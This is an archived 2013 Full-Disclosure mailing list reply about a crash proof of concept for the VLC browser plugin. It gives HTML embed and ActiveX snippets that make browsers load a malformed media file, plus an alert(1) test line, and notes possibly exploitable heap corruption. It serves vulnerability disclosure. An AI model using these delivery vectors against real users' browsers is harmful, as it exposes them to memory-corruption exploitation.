lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 10 Jul 2013 17:45:01 +0530
From: Sachin Shinde <sachinshinde1102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Full-Disclosure Digest, Vol 101, Issue 10

Hi,


Please please please try to understand the attack vectors guys ( please
think all the cases before giving up )

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head><title>Demo of VLC mozilla plugin</title></head>

<body>

<h1>Demo of VLC mozilla plugin - Example 1</h1>

<embed type="application/x-vlc-plugin"
         name="video1"
         autoplay="no" loop="yes" width="400" height="300"
         target="poc.mkv" />
<br />
  <a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
  <a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
  <a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
  <a href="javascript:;"
onclick='document.video1.fullscreen()'>Fullscreen</a>

</body>
</html>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<script>alert(1)</script>
<object
  classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
  codebase="
http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab"
  id="vlc"
  name="vlc"
  class="vlcPlayer"
  events="True">
    <param name="Src" value="poc.mkv" />
    <param name="ShowDisplay" value="True" />
    <param name="AutoLoop" value="True" />
    <param name="AutoPlay" value="True" />
 </object>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now the real problem is plugins are executed outside of the browser process
except IE.


you can use my gist mediafuzz for fuzzing fileformats in browser  (with
little modifications)
https://gist.github.com/cons0ul/2357771

Best,
Sachin Shinde
@cons0ul





On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde
<sachinshinde1102@...il.com>wrote:

> Finally someone dumping debug logs on FD :)
>
> Heres my debug logs
>
>
> http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
> http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ
>
> poc crashes vlc at different addresses ( I have seen 3 different addresses
> so far)
> Looks like heap corruption,can be exploited if vlc plugin crashes in
> browser :)
>
> Cheers,
> Sachin Shinde
> @cons0ul
>

Content of type "text/html" skipped

Download attachment "vlc_chrome.JPG" of type "image/jpeg" (34339 bytes)

Download attachment "vlc_firefox.JPG" of type "image/jpeg" (78781 bytes)

Download attachment "vlc_ie.JPG" of type "image/jpeg" (70484 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ